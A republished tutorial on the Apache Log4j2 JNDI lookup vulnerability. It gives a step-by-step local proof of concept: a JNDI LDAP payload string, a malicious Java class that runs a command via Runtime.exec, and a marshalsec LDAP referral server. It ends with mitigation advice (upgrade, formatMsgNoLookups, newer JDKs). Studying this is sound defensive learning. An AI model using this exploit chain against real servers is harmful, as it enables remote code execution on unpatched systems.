Information Security 4 min read

How to Exploit and Patch the Apache Log4j2 Remote Code Execution Vulnerability

This article explains the Log4j2 vulnerability, demonstrates step‑by‑step exploitation using malicious payloads and LDAP servers, and provides practical mitigation measures including version upgrades and JVM configuration changes to protect Java applications.

MaGe Linux Operations

Feb 11, 2023

How to Exploit and Patch the Apache Log4j2 Remote Code Execution Vulnerability

1. Introduction

Apache Log4j2 is an open‑source Java logging framework widely used in middleware, development frameworks, and web applications.

2. Vulnerability Overview

The flaw stems from recursive lookup functionality in Log4j2, allowing unauthenticated attackers to send specially crafted data that triggers arbitrary code execution on the target server.

3. Affected Versions

Apache Log4j 2.x versions up to 2.15.0‑rc1 are vulnerable.

4. Environment Setup

1) Create a new Maven project and add the Log4j dependency:

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

Exploit

1) Test with a PoC:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
class LogTest {
    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

2) Compile a malicious class Exploit.class:

class Exploit {
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

javac exp.java

3) Start a local LDAP server using marshalsec-0.0.3-SNAPSHOT-all.jar:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888

4) Run the PoC to trigger the malicious class and execute the "calc" command.

By combining other StrLookup variations and using crafted data such as ?Type=A Type&Name=1100110&Char=!, the vulnerability can bypass rc1; RC2 versions have added checks.

5. Mitigation

The Apache project has released patched versions; users should upgrade to the latest release (e.g., 2.15.0‑rc2) and consider the following temporary defenses:

Add JVM startup parameter -Dlog4j2.formatMsgNoLookups=true;

Place a log4j2.component.properties file in the application classpath with log4j2.formatMsgNoLookups=true;

Use JDK 11.0.1, 8u191, 7u201, 6u211 or newer;

Deploy third‑party firewall products for additional protection.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.

Remote Code Execution Security Patch log4j2 Vulnerability Exploit

Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.

0 followers

Reader feedback

How this landed with the community

Rate this article

Was this worth your time?

Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.